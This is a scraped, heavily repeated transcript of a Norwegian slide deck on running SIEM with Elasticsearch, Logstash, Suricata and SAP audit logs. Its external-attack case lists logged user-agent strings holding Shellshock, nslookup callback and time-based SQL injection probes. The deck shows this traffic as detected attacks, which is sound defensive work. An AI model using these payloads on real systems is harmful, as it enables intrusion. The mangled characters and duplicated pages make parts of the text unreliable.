Security Information and Event Management (SIEM) i praksis

23
Security Information and Event Management (SIEM) i praksis Thomas Tinglum, Zedge Roger Skjetlein, Basis Consulting

Transcript of Security Information and Event Management (SIEM) i praksis

Page 1: Security Information and Event Management (SIEM) i praksis

Security Information and Event Management (SIEM) i

praksisThomas Tinglum Zedge

Roger Skjetlein Basis Consulting

Om presentasjonen

Fortelle om praktisk bruk av SIEM i to forskjellige miljoslasher Dette er en teknisk gjennomgang Det er OK aring stille sposlashrsmaringl underveis

Hosting av spesial-loslashsninger Kundenes lsquoekstranettrsquo ogsaring i stor grad webloslashsninger og

portaler +1000 noder og sap selvfoslashlgelig

Infrastruktur for 80M+ brukere verden over

Mobile applikasjoner og web 2200 eventer pr sekund Sender ut over 1PB med data mnd

To noe ulike scenarios

Elasticsearch

Indekserer data

Nesten real-time soslashkbare data ( forsinkelse 1 sec )

All data er i JSON formatet

Skalerer horisontalt

Bruker Apache Lucene biblioteket i bunn

Logstash

Log forwarder

Normalisere data

Sentralisert prosessering av logger

Soslashrger for samsvar i inn-data i elasticsearch

Datafelter i forskjellige log format har ulike navn

Web server Client-IPBrannmur Source IPFil ftp_client_ipSAP client Terminal

Logstashelastic indexerdatasrc_ip

Zedge SIEM arkitektur

Firewall

IDS

Logstash

Apper Heka

elastic indexerdata

Web

Storage

pf iptables

suricata

local file storage

Basis Consulting SIEM arkitektur

logstash

logstash

elastic indexerdata

kibana

proxy

elastic master

elastic client

system logs syslog receiver lumberjack receiver

acl normalising

election fault detection cluster state no master block

sap audit logs read access logs

data merge

customer environment

Ulike datakilder

IDS - Intrusion Detection System Suricata Snort Fail2ban

Web Apache NGINX IIS

FTP vsftpd sftp

Brannmur IPtables packetfilter Cisco ASA FortiGate

Epost Qmail postfix

SAP

IDS

Suricata - multitraringdet IDS

Regler paring protokoll

HTTP normalizer og parser

Overvaringkning opp til L7 OSI

Output JSON direkte

Web

Aksess logger klient IP HTTP kall HTTP status kode tidspunkt user agent stoslashrrelse paring foresposlashrselen

Error logger klient IP HTTP kall tidspunkt feilmelding evt intern modul

Interne foresposlashrsler klient IP HTTP kall tidspunkt hellip

Fil via SSL og SSH

Benytter for transaksjoner (EDI) mellom brukere og ulike sap systemer og integrasjoner

Betydelig angrepsvektor dersom ikke ip filtrering kan benyttes

Angrepsvektor reduseres med enkle midler som feks fail2ban

Distribuerte bruteforce sees relativt enkelt med SIEM

Geoip og plassering paring kart lar oss obeservere unormale hotspots

forsoslashk paring injections

Operativsystem

Eksempel paring brukerinnlogging fra brukeren icinga

Mail

Sjekk av volum

Sjekk av antall mail per koslash

Teller ogsaring antall ikke-leverte mails

Kan ta dette lenger ift spamhaus og maskinlaeligre

SAP

SAP - Systems Applications amp Products

Enkelt forklart haringndterer forretning penger HR varer logistikk etc

Alt fra enkle oslashkosystemer til store komplekse som innbefatter flere hundre noder

Tidskritisk dersom SAP benyttes ifm produksjon

Kritiske og sensitive data

SAP Security Audit Log

Sikkerhetmessige hendelser Endringer av kontoer og aksess Endring av master data Endringer av auditing Start og stopp av transaksjoner

Visualisert Klassifisering kvantaDetalj eksakt type

SAP Router

Setter opp aksess mellom klient og sap infrastruktur

ACL regulert ift klient node og applikasjon

Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106

Router contrsquod

Brudd paring policy visualisert

Read Access LogDriver er ofte regulatoriske krav og offentlige standarder

Full overvaringkning av les og aksess av sensitive data

TBD

Case - eksternt angrep

Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1

Case - eksternt angrep

Case - eksternt angrep

Thomas Tinglum thomaszedgenet

Roger Skjetlein rogerbasis-consultingcom

Page 2: Security Information and Event Management (SIEM) i praksis

Om presentasjonen

Fortelle om praktisk bruk av SIEM i to forskjellige miljoslasher Dette er en teknisk gjennomgang Det er OK aring stille sposlashrsmaringl underveis

Hosting av spesial-loslashsninger Kundenes lsquoekstranettrsquo ogsaring i stor grad webloslashsninger og

portaler +1000 noder og sap selvfoslashlgelig

Infrastruktur for 80M+ brukere verden over

Mobile applikasjoner og web 2200 eventer pr sekund Sender ut over 1PB med data mnd

To noe ulike scenarios

Elasticsearch

Indekserer data

Nesten real-time soslashkbare data ( forsinkelse 1 sec )

All data er i JSON formatet

Skalerer horisontalt

Bruker Apache Lucene biblioteket i bunn

Logstash

Log forwarder

Normalisere data

Sentralisert prosessering av logger

Soslashrger for samsvar i inn-data i elasticsearch

Datafelter i forskjellige log format har ulike navn

Web server Client-IPBrannmur Source IPFil ftp_client_ipSAP client Terminal

Logstashelastic indexerdatasrc_ip

Zedge SIEM arkitektur

Firewall

IDS

Logstash

Apper Heka

elastic indexerdata

Web

Storage

pf iptables

suricata

local file storage

Basis Consulting SIEM arkitektur

logstash

logstash

elastic indexerdata

kibana

proxy

elastic master

elastic client

system logs syslog receiver lumberjack receiver

acl normalising

election fault detection cluster state no master block

sap audit logs read access logs

data merge

customer environment

Ulike datakilder

IDS - Intrusion Detection System Suricata Snort Fail2ban

Web Apache NGINX IIS

FTP vsftpd sftp

Brannmur IPtables packetfilter Cisco ASA FortiGate

Epost Qmail postfix

SAP

IDS

Suricata - multitraringdet IDS

Regler paring protokoll

HTTP normalizer og parser

Overvaringkning opp til L7 OSI

Output JSON direkte

Web

Aksess logger klient IP HTTP kall HTTP status kode tidspunkt user agent stoslashrrelse paring foresposlashrselen

Error logger klient IP HTTP kall tidspunkt feilmelding evt intern modul

Interne foresposlashrsler klient IP HTTP kall tidspunkt hellip

Fil via SSL og SSH

Benytter for transaksjoner (EDI) mellom brukere og ulike sap systemer og integrasjoner

Betydelig angrepsvektor dersom ikke ip filtrering kan benyttes

Angrepsvektor reduseres med enkle midler som feks fail2ban

Distribuerte bruteforce sees relativt enkelt med SIEM

Geoip og plassering paring kart lar oss obeservere unormale hotspots

forsoslashk paring injections

Operativsystem

Eksempel paring brukerinnlogging fra brukeren icinga

Mail

Sjekk av volum

Sjekk av antall mail per koslash

Teller ogsaring antall ikke-leverte mails

Kan ta dette lenger ift spamhaus og maskinlaeligre

SAP

SAP - Systems Applications amp Products

Enkelt forklart haringndterer forretning penger HR varer logistikk etc

Alt fra enkle oslashkosystemer til store komplekse som innbefatter flere hundre noder

Tidskritisk dersom SAP benyttes ifm produksjon

Kritiske og sensitive data

SAP Security Audit Log

Sikkerhetmessige hendelser Endringer av kontoer og aksess Endring av master data Endringer av auditing Start og stopp av transaksjoner

Visualisert Klassifisering kvantaDetalj eksakt type

SAP Router

Setter opp aksess mellom klient og sap infrastruktur

ACL regulert ift klient node og applikasjon

Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106

Router contrsquod

Brudd paring policy visualisert

Read Access LogDriver er ofte regulatoriske krav og offentlige standarder

Full overvaringkning av les og aksess av sensitive data

TBD

Case - eksternt angrep

Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1

Case - eksternt angrep

Case - eksternt angrep

Thomas Tinglum thomaszedgenet

Roger Skjetlein rogerbasis-consultingcom

Page 3: Security Information and Event Management (SIEM) i praksis

Hosting av spesial-loslashsninger Kundenes lsquoekstranettrsquo ogsaring i stor grad webloslashsninger og

portaler +1000 noder og sap selvfoslashlgelig

Infrastruktur for 80M+ brukere verden over

Mobile applikasjoner og web 2200 eventer pr sekund Sender ut over 1PB med data mnd

To noe ulike scenarios

Elasticsearch

Indekserer data

Nesten real-time soslashkbare data ( forsinkelse 1 sec )

All data er i JSON formatet

Skalerer horisontalt

Bruker Apache Lucene biblioteket i bunn

Logstash

Log forwarder

Normalisere data

Sentralisert prosessering av logger

Soslashrger for samsvar i inn-data i elasticsearch

Datafelter i forskjellige log format har ulike navn

Web server Client-IPBrannmur Source IPFil ftp_client_ipSAP client Terminal

Logstashelastic indexerdatasrc_ip

Zedge SIEM arkitektur

Firewall

IDS

Logstash

Apper Heka

elastic indexerdata

Web

Storage

pf iptables

suricata

local file storage

Basis Consulting SIEM arkitektur

logstash

logstash

elastic indexerdata

kibana

proxy

elastic master

elastic client

system logs syslog receiver lumberjack receiver

acl normalising

election fault detection cluster state no master block

sap audit logs read access logs

data merge

customer environment

Ulike datakilder

IDS - Intrusion Detection System Suricata Snort Fail2ban

Web Apache NGINX IIS

FTP vsftpd sftp

Brannmur IPtables packetfilter Cisco ASA FortiGate

Epost Qmail postfix

SAP

IDS

Suricata - multitraringdet IDS

Regler paring protokoll

HTTP normalizer og parser

Overvaringkning opp til L7 OSI

Output JSON direkte

Web

Aksess logger klient IP HTTP kall HTTP status kode tidspunkt user agent stoslashrrelse paring foresposlashrselen

Error logger klient IP HTTP kall tidspunkt feilmelding evt intern modul

Interne foresposlashrsler klient IP HTTP kall tidspunkt hellip

Fil via SSL og SSH

Benytter for transaksjoner (EDI) mellom brukere og ulike sap systemer og integrasjoner

Betydelig angrepsvektor dersom ikke ip filtrering kan benyttes

Angrepsvektor reduseres med enkle midler som feks fail2ban

Distribuerte bruteforce sees relativt enkelt med SIEM

Geoip og plassering paring kart lar oss obeservere unormale hotspots

forsoslashk paring injections

Operativsystem

Eksempel paring brukerinnlogging fra brukeren icinga

Mail

Sjekk av volum

Sjekk av antall mail per koslash

Teller ogsaring antall ikke-leverte mails

Kan ta dette lenger ift spamhaus og maskinlaeligre

SAP

SAP - Systems Applications amp Products

Enkelt forklart haringndterer forretning penger HR varer logistikk etc

Alt fra enkle oslashkosystemer til store komplekse som innbefatter flere hundre noder

Tidskritisk dersom SAP benyttes ifm produksjon

Kritiske og sensitive data

SAP Security Audit Log

Sikkerhetmessige hendelser Endringer av kontoer og aksess Endring av master data Endringer av auditing Start og stopp av transaksjoner

Visualisert Klassifisering kvantaDetalj eksakt type

SAP Router

Setter opp aksess mellom klient og sap infrastruktur

ACL regulert ift klient node og applikasjon

Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106

Router contrsquod

Brudd paring policy visualisert

Read Access LogDriver er ofte regulatoriske krav og offentlige standarder

Full overvaringkning av les og aksess av sensitive data

TBD

Case - eksternt angrep

Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1

Case - eksternt angrep

Case - eksternt angrep

Thomas Tinglum thomaszedgenet

Roger Skjetlein rogerbasis-consultingcom

Page 4: Security Information and Event Management (SIEM) i praksis

Elasticsearch

Indekserer data

Nesten real-time soslashkbare data ( forsinkelse 1 sec )

All data er i JSON formatet

Skalerer horisontalt

Bruker Apache Lucene biblioteket i bunn

Logstash

Log forwarder

Normalisere data

Sentralisert prosessering av logger

Soslashrger for samsvar i inn-data i elasticsearch

Datafelter i forskjellige log format har ulike navn

Web server Client-IPBrannmur Source IPFil ftp_client_ipSAP client Terminal

Logstashelastic indexerdatasrc_ip

Zedge SIEM arkitektur

Firewall

IDS

Logstash

Apper Heka

elastic indexerdata

Web

Storage

pf iptables

suricata

local file storage

Basis Consulting SIEM arkitektur

logstash

logstash

elastic indexerdata

kibana

proxy

elastic master

elastic client

system logs syslog receiver lumberjack receiver

acl normalising

election fault detection cluster state no master block

sap audit logs read access logs

data merge

customer environment

Ulike datakilder

IDS - Intrusion Detection System Suricata Snort Fail2ban

Web Apache NGINX IIS

FTP vsftpd sftp

Brannmur IPtables packetfilter Cisco ASA FortiGate

Epost Qmail postfix

SAP

IDS

Suricata - multitraringdet IDS

Regler paring protokoll

HTTP normalizer og parser

Overvaringkning opp til L7 OSI

Output JSON direkte

Web

Aksess logger klient IP HTTP kall HTTP status kode tidspunkt user agent stoslashrrelse paring foresposlashrselen

Error logger klient IP HTTP kall tidspunkt feilmelding evt intern modul

Interne foresposlashrsler klient IP HTTP kall tidspunkt hellip

Fil via SSL og SSH

Benytter for transaksjoner (EDI) mellom brukere og ulike sap systemer og integrasjoner

Betydelig angrepsvektor dersom ikke ip filtrering kan benyttes

Angrepsvektor reduseres med enkle midler som feks fail2ban

Distribuerte bruteforce sees relativt enkelt med SIEM

Geoip og plassering paring kart lar oss obeservere unormale hotspots

forsoslashk paring injections

Operativsystem

Eksempel paring brukerinnlogging fra brukeren icinga

Mail

Sjekk av volum

Sjekk av antall mail per koslash

Teller ogsaring antall ikke-leverte mails

Kan ta dette lenger ift spamhaus og maskinlaeligre

SAP

SAP - Systems Applications amp Products

Enkelt forklart haringndterer forretning penger HR varer logistikk etc

Alt fra enkle oslashkosystemer til store komplekse som innbefatter flere hundre noder

Tidskritisk dersom SAP benyttes ifm produksjon

Kritiske og sensitive data

SAP Security Audit Log

Sikkerhetmessige hendelser Endringer av kontoer og aksess Endring av master data Endringer av auditing Start og stopp av transaksjoner

Visualisert Klassifisering kvantaDetalj eksakt type

SAP Router

Setter opp aksess mellom klient og sap infrastruktur

ACL regulert ift klient node og applikasjon

Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106

Router contrsquod

Brudd paring policy visualisert

Read Access LogDriver er ofte regulatoriske krav og offentlige standarder

Full overvaringkning av les og aksess av sensitive data

TBD

Case - eksternt angrep

Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1

Case - eksternt angrep

Case - eksternt angrep

Thomas Tinglum thomaszedgenet

Roger Skjetlein rogerbasis-consultingcom

Page 5: Security Information and Event Management (SIEM) i praksis

Logstash

Log forwarder

Normalisere data

Sentralisert prosessering av logger

Soslashrger for samsvar i inn-data i elasticsearch

Datafelter i forskjellige log format har ulike navn

Web server Client-IPBrannmur Source IPFil ftp_client_ipSAP client Terminal

Logstashelastic indexerdatasrc_ip

Zedge SIEM arkitektur

Firewall

IDS

Logstash

Apper Heka

elastic indexerdata

Web

Storage

pf iptables

suricata

local file storage

Basis Consulting SIEM arkitektur

logstash

logstash

elastic indexerdata

kibana

proxy

elastic master

elastic client

system logs syslog receiver lumberjack receiver

acl normalising

election fault detection cluster state no master block

sap audit logs read access logs

data merge

customer environment

Ulike datakilder

IDS - Intrusion Detection System Suricata Snort Fail2ban

Web Apache NGINX IIS

FTP vsftpd sftp

Brannmur IPtables packetfilter Cisco ASA FortiGate

Epost Qmail postfix

SAP

IDS

Suricata - multitraringdet IDS

Regler paring protokoll

HTTP normalizer og parser

Overvaringkning opp til L7 OSI

Output JSON direkte

Web

Aksess logger klient IP HTTP kall HTTP status kode tidspunkt user agent stoslashrrelse paring foresposlashrselen

Error logger klient IP HTTP kall tidspunkt feilmelding evt intern modul

Interne foresposlashrsler klient IP HTTP kall tidspunkt hellip

Fil via SSL og SSH

Benytter for transaksjoner (EDI) mellom brukere og ulike sap systemer og integrasjoner

Betydelig angrepsvektor dersom ikke ip filtrering kan benyttes

Angrepsvektor reduseres med enkle midler som feks fail2ban

Distribuerte bruteforce sees relativt enkelt med SIEM

Geoip og plassering paring kart lar oss obeservere unormale hotspots

forsoslashk paring injections

Operativsystem

Eksempel paring brukerinnlogging fra brukeren icinga

Mail

Sjekk av volum

Sjekk av antall mail per koslash

Teller ogsaring antall ikke-leverte mails

Kan ta dette lenger ift spamhaus og maskinlaeligre

SAP

SAP - Systems Applications amp Products

Enkelt forklart haringndterer forretning penger HR varer logistikk etc

Alt fra enkle oslashkosystemer til store komplekse som innbefatter flere hundre noder

Tidskritisk dersom SAP benyttes ifm produksjon

Kritiske og sensitive data

SAP Security Audit Log

Sikkerhetmessige hendelser Endringer av kontoer og aksess Endring av master data Endringer av auditing Start og stopp av transaksjoner

Visualisert Klassifisering kvantaDetalj eksakt type

SAP Router

Setter opp aksess mellom klient og sap infrastruktur

ACL regulert ift klient node og applikasjon

Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106

Router contrsquod

Brudd paring policy visualisert

Read Access LogDriver er ofte regulatoriske krav og offentlige standarder

Full overvaringkning av les og aksess av sensitive data

TBD

Case - eksternt angrep

Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1

Case - eksternt angrep

Case - eksternt angrep

Thomas Tinglum thomaszedgenet

Roger Skjetlein rogerbasis-consultingcom

Page 6: Security Information and Event Management (SIEM) i praksis

Zedge SIEM arkitektur

Firewall

IDS

Logstash

Apper Heka

elastic indexerdata

Web

Storage

pf iptables

suricata

local file storage

Basis Consulting SIEM arkitektur

logstash

logstash

elastic indexerdata

kibana

proxy

elastic master

elastic client

system logs syslog receiver lumberjack receiver

acl normalising

election fault detection cluster state no master block

sap audit logs read access logs

data merge

customer environment

Ulike datakilder

IDS - Intrusion Detection System Suricata Snort Fail2ban

Web Apache NGINX IIS

FTP vsftpd sftp

Brannmur IPtables packetfilter Cisco ASA FortiGate

Epost Qmail postfix

SAP

IDS

Suricata - multitraringdet IDS

Regler paring protokoll

HTTP normalizer og parser

Overvaringkning opp til L7 OSI

Output JSON direkte

Web

Aksess logger klient IP HTTP kall HTTP status kode tidspunkt user agent stoslashrrelse paring foresposlashrselen

Error logger klient IP HTTP kall tidspunkt feilmelding evt intern modul

Interne foresposlashrsler klient IP HTTP kall tidspunkt hellip

Fil via SSL og SSH

Benytter for transaksjoner (EDI) mellom brukere og ulike sap systemer og integrasjoner

Betydelig angrepsvektor dersom ikke ip filtrering kan benyttes

Angrepsvektor reduseres med enkle midler som feks fail2ban

Distribuerte bruteforce sees relativt enkelt med SIEM

Geoip og plassering paring kart lar oss obeservere unormale hotspots

forsoslashk paring injections

Operativsystem

Eksempel paring brukerinnlogging fra brukeren icinga

Mail

Sjekk av volum

Sjekk av antall mail per koslash

Teller ogsaring antall ikke-leverte mails

Kan ta dette lenger ift spamhaus og maskinlaeligre

SAP

SAP - Systems Applications amp Products

Enkelt forklart haringndterer forretning penger HR varer logistikk etc

Alt fra enkle oslashkosystemer til store komplekse som innbefatter flere hundre noder

Tidskritisk dersom SAP benyttes ifm produksjon

Kritiske og sensitive data

SAP Security Audit Log

Sikkerhetmessige hendelser Endringer av kontoer og aksess Endring av master data Endringer av auditing Start og stopp av transaksjoner

Visualisert Klassifisering kvantaDetalj eksakt type

SAP Router

Setter opp aksess mellom klient og sap infrastruktur

ACL regulert ift klient node og applikasjon

Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106

Router contrsquod

Brudd paring policy visualisert

Read Access LogDriver er ofte regulatoriske krav og offentlige standarder

Full overvaringkning av les og aksess av sensitive data

TBD

Case - eksternt angrep

Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1

Case - eksternt angrep

Case - eksternt angrep

Thomas Tinglum thomaszedgenet

Roger Skjetlein rogerbasis-consultingcom

Page 7: Security Information and Event Management (SIEM) i praksis

Basis Consulting SIEM arkitektur

logstash

logstash

elastic indexerdata

kibana

proxy

elastic master

elastic client

system logs syslog receiver lumberjack receiver

acl normalising

election fault detection cluster state no master block

sap audit logs read access logs

data merge

customer environment

Ulike datakilder

IDS - Intrusion Detection System Suricata Snort Fail2ban

Web Apache NGINX IIS

FTP vsftpd sftp

Brannmur IPtables packetfilter Cisco ASA FortiGate

Epost Qmail postfix

SAP

IDS

Suricata - multitraringdet IDS

Regler paring protokoll

HTTP normalizer og parser

Overvaringkning opp til L7 OSI

Output JSON direkte

Web

Aksess logger klient IP HTTP kall HTTP status kode tidspunkt user agent stoslashrrelse paring foresposlashrselen

Error logger klient IP HTTP kall tidspunkt feilmelding evt intern modul

Interne foresposlashrsler klient IP HTTP kall tidspunkt hellip

Fil via SSL og SSH

Benytter for transaksjoner (EDI) mellom brukere og ulike sap systemer og integrasjoner

Betydelig angrepsvektor dersom ikke ip filtrering kan benyttes

Angrepsvektor reduseres med enkle midler som feks fail2ban

Distribuerte bruteforce sees relativt enkelt med SIEM

Geoip og plassering paring kart lar oss obeservere unormale hotspots

forsoslashk paring injections

Operativsystem

Eksempel paring brukerinnlogging fra brukeren icinga

Mail

Sjekk av volum

Sjekk av antall mail per koslash

Teller ogsaring antall ikke-leverte mails

Kan ta dette lenger ift spamhaus og maskinlaeligre

SAP

SAP - Systems Applications amp Products

Enkelt forklart haringndterer forretning penger HR varer logistikk etc

Alt fra enkle oslashkosystemer til store komplekse som innbefatter flere hundre noder

Tidskritisk dersom SAP benyttes ifm produksjon

